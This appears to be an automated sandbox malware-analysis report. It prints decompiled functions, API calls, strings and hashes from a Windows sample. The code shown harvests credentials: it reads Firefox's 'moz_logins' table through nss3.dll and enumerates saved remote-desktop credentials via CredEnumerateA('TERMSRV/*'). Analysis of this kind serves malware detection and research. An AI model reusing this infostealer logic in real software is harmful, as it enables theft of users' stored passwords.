                                                                        • Instruction Fuzzy Hash: 38312972900209EBDF219F84DC0ABEEB7B4EB44305F184436E550B62D0D7B95AD4DBAA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E0040C0C3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				CHAR* _v16;
                                                                        				CHAR* _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v28;
                                                                        				int _t35;
                                                                        
                                                                        				if(_a16 == 5) {
                                                                        					_t35 = E0040B1AB(_a12, 2,  &_v8,  &_v12,  &_v16);
                                                                        					if(_v12 == 1) {
                                                                        						_push(_v16);
                                                                        						_pop( *_t8);
                                                                        						_t35 = lstrcmpiA(_v20, "moz_logins");
                                                                        						if(_t35 == 0) {
                                                                        							_t35 = E0040B1AB(_a12, 0,  &_v8,  &_v12,  &_v16);
                                                                        							if(_v12 == 1) {
                                                                        								_t35 = lstrcmpA("table", _v16);
                                                                        								if(_t35 == 0) {
                                                                        									_t35 = E0040B1AB(_a12, 3,  &_v8,  &_v12,  &_v16);
                                                                        									if(_v12 == 0) {
                                                                        										 *_t22 =  *_v16;
                                                                        										_t35 = E0040B1AB(_a12, 4,  &_v8,  &_v12,  &_v16);
                                                                        										if(_v12 == 1) {
                                                                        											 *0x419158 = 0xffffffff;
                                                                        											 *0x41915c = 0xffffffff;
                                                                        											 *0x419160 = 0xffffffff;
                                                                        											_t35 = E0040B69A(_v16, E0040BE43);
                                                                        											_v28 = 1;
                                                                        											if( *0x419158 != 0xffffffff &&  *0x41915c != 0xffffffff &&  *0x419160 != 0xffffffff) {
                                                                        												return E0040B38F(_a4, _a8, _v24,  &_v28, _a20, E0040BEFE);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t35;
                                                                        			}










                                                                        APIs
                                                                        • lstrcmpiA.KERNEL32(00000000,moz_logins,?), ref: 0040C101
                                                                        • lstrcmpA.KERNEL32(table,?,00000000,moz_logins,?), ref: 0040C136
                                                                          • Part of subcall function 0040B69A: StrStrIA.SHLWAPI(?,() ), ref: 0040B6AA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrcmplstrcmpi
                                                                        • String ID: moz_logins$table
                                                                        • API String ID: 3524194181-1174185386
                                                                        • Opcode ID: d03f47c64e517c75710b6f96bc8a4cf34e83e1d624fd46c84193a1899ce28047
                                                                        • Instruction ID: 9aaa2a27647da64927c3ca6f9125f509d968329839c130476f5429ed0db09bc1
                                                                        • Opcode Fuzzy Hash: d03f47c64e517c75710b6f96bc8a4cf34e83e1d624fd46c84193a1899ce28047
                                                                        • Instruction Fuzzy Hash: 8831D47280020EFADF219F90CC85EDE7B79AB05324F104366E520F51E1DB399B94EB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E00401A09(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v280;
                                                                        				signed int _v284;
                                                                        				signed int _t27;
                                                                        				void* _t29;
                                                                        				signed int _t44;
                                                                        				signed int _t46;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        
                                                                        				_t49 = __edx;
                                                                        				_t48 = __ecx;
                                                                        				_t27 = GetTickCount();
                                                                        				asm("rol eax, 0xb");
                                                                        				_v284 =  !_t27;
                                                                        				_t46 = 0;
                                                                        				_t29 =  &_v8;
                                                                        				_push(_t29);
                                                                        				_push(_a4);
                                                                        				L00410DBE();
                                                                        				if(_t29 >= 0) {
                                                                        					_v16 = E0040106A(_t29, _t49, _a4);
                                                                        					_t29 = GlobalLock(_v8);
                                                                        					_t51 = _t29;
                                                                        					if(_t29 != 0) {
                                                                        						_v20 = _t29;
                                                                        						_v12 = E004017EC(_v16);
                                                                        						E00401823(_v20, _v12, _v16);
                                                                        						GlobalUnlock(_v8);
                                                                        						E0040185C(_t48, _t51,  &_v280,  &_v284, 4);
                                                                        						E004012C7(E004018C7( &_v280, _v12, _v16), _t49, _a4);
                                                                        						_t44 = E0040149B(_a4,  &_v284, 4);
                                                                        						_t46 = _t44 & E0040149B(_a4, _v12, _v16);
                                                                        						_t29 = E004017D5(_v12);
                                                                        					}
                                                                        				}
                                                                        				E0040125A(_t29, _t49, _a4);
                                                                        				return _t46;
                                                                        			}
















                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00401A13
                                                                        • GetHGlobalFromStream.OLE32(?,?,?,?,00410565,?,?,?,?,Oguqcogtkec,?,?,?,?,00000000,?), ref: 00401A2C
                                                                        • GlobalLock.KERNEL32 ref: 00401A47
                                                                          • Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA
                                                                        • GlobalUnlock.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,00410565,?,?,?,?), ref: 00401A6F
                                                                          • Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
                                                                        • String ID:
                                                                        • API String ID: 1884134869-0
                                                                        • Opcode ID: 9ec4ad7614db6a7481ded8012edae2c9129aef1efae498da208f41ebf576815f
                                                                        • Instruction ID: 1816704bb606bad1ac1aad56d21282bb97894661860074deb7c63e9bdd074128
                                                                        • Opcode Fuzzy Hash: 9ec4ad7614db6a7481ded8012edae2c9129aef1efae498da208f41ebf576815f
                                                                        • Instruction Fuzzy Hash: 7721797690010CBADF01AFA1DC429EDBFB9EF04344F0041BAB615B50B1EB799B959F58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040CC8E(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				char* _t29;
                                                                        				char* _t32;
                                                                        
                                                                        				E00401486(_a4, 0xbeef0000);
                                                                        				E004014E8(_a4, _a8);
                                                                        				E004014E8(_a4, _a12);
                                                                        				E004014BC(_a4, _a16, _a20);
                                                                        				_t29 = StrStrIA(_a12, 0x415f85);
                                                                        				if(_t29 == 0) {
                                                                        					_v12 = lstrlenA("TERMSRV/");
                                                                        					_t32 = StrStrIA(_a12, "TERMSRV/");
                                                                        					if(_t32 != 0) {
                                                                        						_a12 = _t32;
                                                                        					}
                                                                        					_t29 = E0040370F(_t32, _a12);
                                                                        					if(_t29 != 0xffffffff) {
                                                                        						_v8 = _t29;
                                                                        						E00401486(_a4, 0xbeef0001);
                                                                        						E004014E8(_a4, _a8);
                                                                        						E00401486(_a4, _v8);
                                                                        						return E004014BC(_a4, _a16, _a20);
                                                                        					}
                                                                        				}
                                                                        				return _t29;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4
                                                                        • StrStrIA.SHLWAPI(?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCCD
                                                                        • lstrlenA.KERNEL32(TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCDB
                                                                        • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: TERMSRV/
                                                                        • API String ID: 1659193697-3001602198
                                                                        • Opcode ID: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
                                                                        • Instruction ID: a6930c2e67e34cc212e01140ebbd4d9fa3ed10fe33d805293db90992e34d82a9
                                                                        • Opcode Fuzzy Hash: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
                                                                        • Instruction Fuzzy Hash: 4911FA71450109FFCF126FA1CC829DD3E62AF10354F10863ABD14741F1D77A8AB2AB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040CC8E(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				char* _t29;
                                                                        				char* _t32;
                                                                        
                                                                        				E00401486(_a4, 0xbeef0000);
                                                                        				E004014E8(_a4, _a8);
                                                                        				E004014E8(_a4, _a12);
                                                                        				E004014BC(_a4, _a16, _a20);
                                                                        				_t29 = StrStrIA(_a12, 0x415f85);
                                                                        				if(_t29 == 0) {
                                                                        					_v12 = lstrlenA("TERMSRV/");
                                                                        					_t32 = StrStrIA(_a12, "TERMSRV/");
                                                                        					if(_t32 != 0) {
                                                                        						_a12 = _t32;
                                                                        					}
                                                                        					_t29 = E0040370F(_t32, _a12);
                                                                        					if(_t29 != 0xffffffff) {
                                                                        						_v8 = _t29;
                                                                        						E00401486(_a4, 0xbeef0001);
                                                                        						E004014E8(_a4, _a8);
                                                                        						E00401486(_a4, _v8);
                                                                        						return E004014BC(_a4, _a16, _a20);
                                                                        					}
                                                                        				}
                                                                        				return _t29;
                                                                        			}








                                                                        APIs
                                                                          • Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4
                                                                        • StrStrIA.SHLWAPI(?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCCD
                                                                        • lstrlenA.KERNEL32(TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCDB
                                                                        • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,00415F85,?,?,?,?,BEEF0000), ref: 0040CCEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: TERMSRV/
                                                                        • API String ID: 1659193697-3001602198
                                                                        • Opcode ID: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
                                                                        • Instruction ID: a6930c2e67e34cc212e01140ebbd4d9fa3ed10fe33d805293db90992e34d82a9
                                                                        • Opcode Fuzzy Hash: 627aaf26f0225197c5aa5c5c924a23d4e09da5c46d72da40a325893888861a00
                                                                        • Instruction Fuzzy Hash: 4911FA71450109FFCF126FA1CC829DD3E62AF10354F10863ABD14741F1D77A8AB2AB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00401D69(CHAR* _a4, CHAR* _a8) {
                                                                        				int _t11;
                                                                        				CHAR* _t21;
                                                                        
                                                                        				if(_a4 == 0) {
                                                                        					_a4 = 0x4140dc;
                                                                        				}
                                                                        				if(_a8 == 0) {
                                                                        					_a8 = 0x4140dc;
                                                                        				}
                                                                        				_t11 = lstrlenA(_a4);
                                                                        				_t21 = E004017EC(_t11 + lstrlenA(_a8) + 1);
                                                                        				lstrcpyA(_t21, _a4);
                                                                        				lstrcatA(_t21, _a8);
                                                                        				if(_a4 != 0x4140dc) {
                                                                        					E004017D5(_a4);
                                                                        				}
                                                                        				return _t21;
                                                                        			}






                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D8A
                                                                        • lstrlenA.KERNEL32(?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401D94
                                                                        • lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401DA8
                                                                        • lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020B8,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000), ref: 00401DB1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                        • String ID:
                                                                        • API String ID: 2414487701-0
                                                                        • Opcode ID: 6cc6e09272474b3cb8dce6ba2176f2269a61a8de9243c3ed8c0684545af6c42b
                                                                        • Instruction ID: 9ae4c9ae6809e1f747658f89b899b66aaa74484b7ddbf5727539b292c185063a
                                                                        • Opcode Fuzzy Hash: 6cc6e09272474b3cb8dce6ba2176f2269a61a8de9243c3ed8c0684545af6c42b
                                                                        • Instruction Fuzzy Hash: F3F03075100208BFCF112F62CC81ADE3EA8AF1535CF00C13AB9051A262E7BDC9D48F88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 00408ED8
                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00408EF9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectorylstrlen
                                                                        • String ID: nss3.dll
                                                                        • API String ID: 2713697268-2492180550
                                                                        • Opcode ID: 3f80516e9565581d8ce7fddc40a23c3c96676ac7c463f2c8aad417b34e152649
                                                                        • Instruction ID: 8c4d155ad2526371845bb933d3f11b8da1162bc186a42e2439c8c001b69ebc86
                                                                        • Opcode Fuzzy Hash: 3f80516e9565581d8ce7fddc40a23c3c96676ac7c463f2c8aad417b34e152649
                                                                        • Instruction Fuzzy Hash: EA115E71510A01EBDB103F34ED4ABC63FA2EB94354F14803AF441A42A1DB7A55E0CA9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 16%
                                                                        			E0040CD3F(intOrPtr _a4) {
                                                                        				void* _v8;
                                                                        				char _v12;
                                                                        				void* _t17;
                                                                        				intOrPtr* _t23;
                                                                        				void* _t25;
                                                                        
                                                                        				if( *0x4143f5 != 0 &&  *0x4143f1 != 0 &&  *0x41442d != 0) {
                                                                        					_v8 = 0;
                                                                        					_v12 = 0;
                                                                        					_t17 =  *0x4143f1("TERMSRV/*", 0,  &_v12,  &_v8);
                                                                        					if(_t17 != 0 && _v12 != 0 && _v8 != 0) {
                                                                        						_t23 = _v8;
                                                                        						while(_v12 != 0 &&  *_t23 != 0) {
                                                                        							E0040CC8E(__eflags, _a4,  *((intOrPtr*)( *_t23 + 0x30)),  *((intOrPtr*)( *_t23 + 8)),  *((intOrPtr*)(_t24 + 0x1c)),  *((intOrPtr*)(_t24 + 0x18)));
                                                                        							_t25 = _t23;
                                                                        							_v12 = _v12 - 1;
                                                                        							_t23 = _t25 + 4;
                                                                        							__eflags = _t23;
                                                                        						}
                                                                        						return  *0x4143f5(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t17;
                                                                        			}









                                                                        APIs
                                                                        • CredEnumerateA.ADVAPI32(TERMSRV/*,00000000,00000000,00000000), ref: 0040CD7E
                                                                        • CredFree.ADVAPI32(00000000), ref: 0040CDC5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.696443700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Cred$EnumerateFree
                                                                        • String ID: TERMSRV/*
                                                                        • API String ID: 3403564193-275249402
                                                                        • Opcode ID: d0e299ef229a2a28e4c5329bb093eb38bbe2de71871c04fe3f67b1ad540f1a29
                                                                        • Instruction ID: a372621de2bce721beb090cfe78feac401f7af25901f3d57f49ef118639a82fb
                                                                        • Opcode Fuzzy Hash: d0e299ef229a2a28e4c5329bb093eb38bbe2de71871c04fe3f67b1ad540f1a29
                                                                        • Instruction Fuzzy Hash: FF115B72910609FBDF218F84D8C9BDABBB4EF04305F14427BE851721E0C7789A84DB9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%